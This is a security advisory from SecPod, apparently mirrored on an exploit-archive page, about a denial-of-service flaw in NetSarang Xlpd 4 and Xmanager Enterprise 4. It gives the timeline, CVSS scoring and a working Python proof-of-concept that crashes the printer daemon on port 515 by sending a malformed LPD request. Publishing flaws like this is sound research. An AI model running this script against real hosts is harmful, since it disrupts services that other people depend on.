扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 |
############################################################################## # # Title: NetSarang Xlpd Printer Daemon Denial of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.netsarang.com # Advisory : http://secpod.org/blog/?p=457 #http://secpod.org/advisories/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS_Vuln.txt #http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py # Software : NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build 0186 # Date : 01/02/2012 # ############################################################################## SecPod ID: 1033 14/12/2011 Issue Discovered 20/01/2012 Vendor Notified No Response 01/02/2012 Advisory Released Class: Denial Of Service Severity: Medium Overview: --------- NetSarang Xlpd Printer Daemon version 4 is prone to a denial of service vulnerability. Technical Description: ---------------------- The vulnerability is caused due to improper validation of malicious LPD request sent to printer daemon, which allows remote attackers to crash the service. Impact: -------- Successful exploitation could allow an attacker to cause denial of service condition. Affected Software: ------------------ NetSarang Xlpd 4 Build 0100 NetSarang Xmanager Enterprise 4 Build 0186 Tested on: ----------- NetSarang Xlpd 4 Build 0100 on Windows XP SP3. NetSarang Xmanager Enterprise 4 Build 0186 on Windows XP SP3. Older versions might be affected. References: ----------- http://www.netsarang.com http://secpod.org/blog/?p=457 Proof of Concept: ---------------- http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR= NETWORK ACCESS_COMPLEXITY= LOW AUTHENTICATION = NOT_REQUIRED CONFIDENTIALITY_IMPACT = NONE INTEGRITY_IMPACT = NONE AVAILABILITY_IMPACT= PARTIAL EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL= UNAVAILABLE REPORT_CONFIDENCE= CONFIRMED CVSS Base Score= 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P) Risk factor= Medium Credits: -------- Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this vulnerability. #!/usr/bin/python ############################################################################## # # Title: NetSarang Xlpd Printer Daemon Denial of Service Vulnerability # Author : Prabhu S Angadi SecPod Technologies (www.secpod.com) # Vendor : http://www.netsarang.com # Advisory : http://secpod.org/blog/?p=457 #http://secpod.org/advisories/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS_Vuln.txt #http://secpod.org/exploits/SecPod_Exploit_NetSarang_Xlpd_Printer_Daemon_DoS.py # Software : NetSarang Xlpd 4 Build 0100 and NetSarang Xmanager Enterprise 4 Build 0186 # Date : 01/02/2012 # ############################################################################## import socket,sys,time port = 515 if len(sys.argv) < 2: print "\n[-] Usage: %s <target addr>" % sys.argv[0] sys.exit(0) target = sys.argv[1] sockObj = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: sockObj.connect((target,port)) except: print "\n[-] Xlpd service is down." sys.exit(0) sockObj.send("crap"+"LF") sockObj.send("LF") #Will wait for a while time.sleep(5) sockObj.close() try: sockObj.connect((target,port)) except: print "\n[-] Xlpd service is crashed, unble to connect" sys.exit(0) |
体验盒子
